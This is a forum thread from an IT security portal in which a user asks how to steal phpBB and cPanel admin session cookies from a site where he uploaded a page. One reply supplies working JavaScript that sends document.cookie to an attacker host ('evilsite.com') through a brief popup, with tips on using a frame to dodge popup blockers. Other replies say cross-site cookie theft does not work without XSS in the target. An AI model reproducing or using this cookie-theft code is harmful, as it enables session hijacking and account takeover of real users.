Waraxe IT Security Portal
Login or Register
September 10, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 919
Members: 0
Total: 919
Full disclosure
[0day-rubbish] Royal Server 5.04.50529.0 Local privilege escalation to LocalSystem on the execution path without credential override (7.2)
[0day-rubbish] core-admin 1.0.164 (build 16468) Systemic shell command injection via ineffective quote escaping (8.8)
[0day-rubbish] OP5 Monitor 9.20 Command injection surviving the CVE-2025-34115 patch (OPT-IN fix ineffective) (8.8)
[0day-rubbish] QuantaStor 6.8.3.018 Command injection in the alert-mail command via the smtpPassword field (8.8)
[0day-rubbish] SmarterMail 100.0.9693 (Build 9693) Antivirus command-line configuration executing as NT AUTHORITY\SYSTEM (7.2)
[0day-rubbish] Jitterbit Agent 12.8.1.6 (Docker jitterbit/agent:12.8.1.6) Unauthenticated SOAP with hard-coded credentials leading to OS command execution (9.8)
[0day-rubbish] Accurate Online Private Cloud on-prem (current) Unauthenticated Hessian deserialization leading to JNDI remote class loading (9.8)
[0day-rubbish] DBxtra .NET 13.1.1.0 Unauthenticated SOAP API to xp_cmdshell code execution (9.8)
**Subject:** CVE-2026-2035703: Tozed ZLT X300 5G CPE — Unauthenticated Remote Root Code Execution via TR-069 Command Injection (CVSS 9.8)
CVE-2026-52307: Stored XSS in 1CMS v5.6
HP Easy Start for macOS: CVE-2026-12554 / CVE-2026-12555 /CVE-2026-12556
Next.js 16.4.0-canary.13 Image Optimizer DNS Rebinding TOCTOU SSRF Still Exists
O-CMS 1.0.0 Authenticated OS Command Injection viaai_cli_script
Flextype v1.0.0-alpha.3 CMS registerShortcodes() Remote Code Execution via Attacker-Controlled File Inclusion
Flextype v1.0.0-alpha.3 Stored Fetch Shortcode Allows Server-Side Request Forgery
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> again cookie stealin'
Post new topicReply to topic View previous topic :: View next topic
again cookie stealin'
PostPosted: Fri Oct 01, 2004 8:49 pm Reply with quote
Roberto
Regular user
Regular user
Joined: Sep 01, 2004
Posts: 8




i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.

i may direct people to that uploaded page,it is easy

but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?

of course i will upload an evil script to my site.

thanks again
View user's profile Send private message
PostPosted: Sun Dec 12, 2004 12:13 pm Reply with quote
Oguz
Regular user
Regular user
Joined: Nov 29, 2004
Posts: 7




i need this too ...
View user's profile Send private message
PostPosted: Sun Dec 12, 2004 1:55 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




there are very many ways you could do it i'll write here one from which
you can make a better one.

html 1
Code:

<html>
<head>
<title>reperdalaj</title>
<script language="JavaScript" src="foo.js"></script>
</head>

<body>
hi i'm evil page!
</body>

</html>


foo.js 1
Code:

var query = "www.evilsite.com/script.php?string=" + document.cookie;
var nWindow = window.open(query,'nwin','height=1;width=1');
nWindow.close();


this loads a popup window for very short time.
after remembering that there are pop-up blockers this will not probably work on many users.

you could make a frame instead and join the html and js, learning html and basic javascript helps. so take your time and google. Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Re: again cookie stealin'
PostPosted: Sat Dec 18, 2004 3:59 pm Reply with quote
emrag
Regular user
Regular user
Joined: Jun 03, 2004
Posts: 20
Location: TURKEY




Roberto wrote:
i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.

i may direct people to that uploaded page,it is easy

but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?

of course i will upload an evil script to my site.

thanks again



i think this isn't possible so you want a phpbb's cookie but there is no XSS in it. you can't get a site's cookie with another site's XSS.
View user's profile Send private message MSN Messenger ICQ Number
PostPosted: Sun Feb 27, 2005 8:48 pm Reply with quote
Alkaen
Regular user
Regular user
Joined: Feb 16, 2005
Posts: 5
Location: Bahrain - Aldair




Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n

_________________
Alkaen with u..
View user's profile Send private message Visit poster's website
PostPosted: Fri Mar 04, 2005 6:20 am Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




Alkaen wrote:
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n


i did get shit
lol of course i got that but plz write neat thats ricicule**
View user's profile Send private message
PostPosted: Tue Dec 05, 2006 7:43 pm Reply with quote
faifas
Regular user
Regular user
Joined: Feb 25, 2005
Posts: 8




HaCkZataN wrote:
Alkaen wrote:
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n


i did get shit
lol of course i got that but plz write neat thats ricicule**

3 = e
5 = s
$ = 5 = s
etc.
View user's profile Send private message Visit poster's website
again cookie stealin'
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds